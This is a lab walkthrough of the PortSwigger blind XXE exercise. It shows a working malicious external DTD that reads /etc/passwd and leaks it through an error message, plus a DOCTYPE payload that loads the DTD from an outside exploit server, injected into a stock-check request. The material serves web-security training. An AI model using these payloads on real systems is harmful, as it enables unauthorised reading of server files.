Exploiting blind XXE to retrieve data via error messages

Introduction

So, this is our 6th lab where we are solving the official PortSwigger Web Security labs. Today, we will solve the “Exploiting Blind XXE to Retrieve Data via Error Messages” lab. Just like in the 6th lab, we stored a malicious DTD file on an external server and then ran it on the server using an XML vulnerability. Today, we will also host our malicious DTD exploit on an external server in this lab.

Table of Contents

Lab Description Of Exploiting blind XXE to retrieve data via error messages

n this lab, we have a “check stock” feature that parses XML input. However, there won’t be any output displayed in this lab. To solve this lab, we need to use an external DTD to trigger an error message. Through that error message, we will attempt to access the /etc/passwd file.

We also have a link in the lab, which is the exploit server, where you can host your malicious DTD file.

Lab Solution

First, we will access the lab. After accessing the lab, we will have an option to go to the exploit server. We will click on “Go to exploit server” and there we will host our malicious DTD file.

<!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY % exfil SYSTEM 'file:///invalid/%file;'>"> %eval; %exfil;

This is our malicious DTD code that we will store on the server.

As you can see in the screenshot above, first I visited the “Go to exploit server” option, where I inserted the DTD file in the body and stored it. After doing this, I clicked on “View exploit” and now my exploit is ready.

Next, I will exploit the stock checker feature by adding an entity parameter that references the malicious DTD.

Now, let’s go back to the lab and view the details of any product. After that, we will see a stock check feature.

We will click on the stock check feature and intercept it using Burp Suite. Once intercepted, we will send it to the repeater tab for further testing.

In the repeater tab, when you send a POST-based request, you need to insert the following code:

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>

After doing this, execute the code by copying the URL of the DTD file we previously inserted on the server and paste it into the code.

As you can see, we have successfully accessed the /etc/passwd file.

Our final payload is:

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0a33006f041fa2bc81fb9ac601760061.exploit-server.net/exploit"> %xxe;]>

Now, let’s refresh the lab and check if it has been successfully solved or not.

So, we have successfully solved the lab “Exploiting blind XXE to retrieve data via error messages”. Congratulations to all of you! This was our 6th article on XML injection, which falls under the category of web security. If you’re interested in further exploring web security, you can study from our website.

To continue studying check out the next lab i.e. Exploiting XInclude To Retrieve Files, cover the current lab before visiting the next lab. Good Luck!